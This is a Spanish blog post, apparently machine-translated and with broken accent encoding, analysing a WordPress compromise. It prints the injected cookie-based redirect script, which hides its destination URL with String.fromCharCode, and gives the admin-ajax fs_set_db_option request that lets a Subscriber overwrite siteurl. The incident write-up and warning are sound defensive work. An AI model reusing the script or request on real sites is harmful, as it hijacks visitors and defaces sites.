La semana pasada me encontr茅 con un hecho extremadamente desagradable. Despu茅s de visitar mi sitio, descubr铆 que me redirige a un recurso desconocido para m铆, que el antivirus Dr. jura extremadamente Web
Orgullosamente impulsado por WordPress versi贸n 5.1
Todas las actualizaciones salientes para el motor, el complemento y el tema se instalan a tiempo. Complementos solo del repositorio oficial, tema tambi茅n.
La copia de seguridad del sitio se descarg贸 inmediatamente, se escane贸 con un software antivirus (Dr. Web, Kaspersky, AI-BOLIT), pero no hubo resultados, todo est谩 limpio.
Comprueba manualmente los archivos de tema y algunos complementos, pero nuevamente no hubo resultado.
Al verificar el volcado de la base de datos en la tabla wp_options en el par谩metro siteurl, la URL de otra persona estaba oculta. En realidad, hubo una redirecci贸n hacia 茅l.
Esto sucedi贸 de acuerdo con el principio: al cargar la p谩gina, el par谩metro "siteurl" se sustituy贸 en todos
<script type='text/javascript' src=' URL '></script>
En este caso, se carg贸 el siguiente script:
var x = getCookie('pp000001'); if (x) { var x2 = getCookie('pp000002'); if (x2) { var sdfgdfg = "URL";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } else { setCookie('pp000002','1',1); var sdfgdfg = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 112, 117, 115, 104, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } } else { setCookie('pp000001','1',1); var sdfgdfg = "URL";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } function setCookie(name,value,days) { var expires = ""; if (days) { var date = new Date(); date.setTime(date.getTime() + (days*8*60*60*1000)); expires = "; expires=" + date.toUTCString(); } document.cookie = name + "=" + (value || "") + expires + "; path=/"; } function getCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function eraseCookie(name) { document.cookie = name+'=; Max-Age=-99999999;'; }
La forma en que la URL de otra persona ingres贸 a la base de datos sigue siendo un misterio. Cambiando la URL a la correcta, todo volvi贸 a funcionar, pero al d铆a siguiente, al verificar, volv铆 a ver al Dr. Web jura en la p谩gina redirigida. Este par谩metro fue cambiado nuevamente en la base de datos.
Despu茅s de eso, se descargaron nuevos registros de acceso al sitio y registros de errores. No hubo errores, pero se encontr贸 una solicitud extremadamente interesante para el sitio en los registros de acceso:
/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=siteurl&option_value= URL
Despu茅s de corregir nuevamente la configuraci贸n y comprobar que todo funciona, intent茅 repetir esta solicitud en el sitio, pero nada funcion贸. La configuraci贸n en la base de datos no ha cambiado.
Cabe se帽alar que el sitio est谩 abierto para el registro y los usuarios obtienen el rol de "Suscriptor", el acceso a la parte administrativa est谩 completamente cerrado.
Se intent贸 registrar un nuevo usuario, iniciar sesi贸n, y despu茅s de que esta solicitud al sitio funcion贸, la configuraci贸n de la base de datos cambi贸.
Como resultado, resulta que si el registro de usuario est谩 abierto en el sitio, incluso con el rol de Suscriptor y el acceso al panel de administraci贸n est谩 cerrado, esta solicitud a煤n funciona.
Se verific贸 en otro sitio, despu茅s de haber apagado todos los complementos y configurar el tema predeterminado, el resultado es el mismo.
C贸mo luchar, excepto c贸mo desactivar el registro y eliminar usuarios sospechosos: todav铆a no he encontrado una soluci贸n.
PD: google la solicitud, se encontraron sitios infectados, tenga cuidado.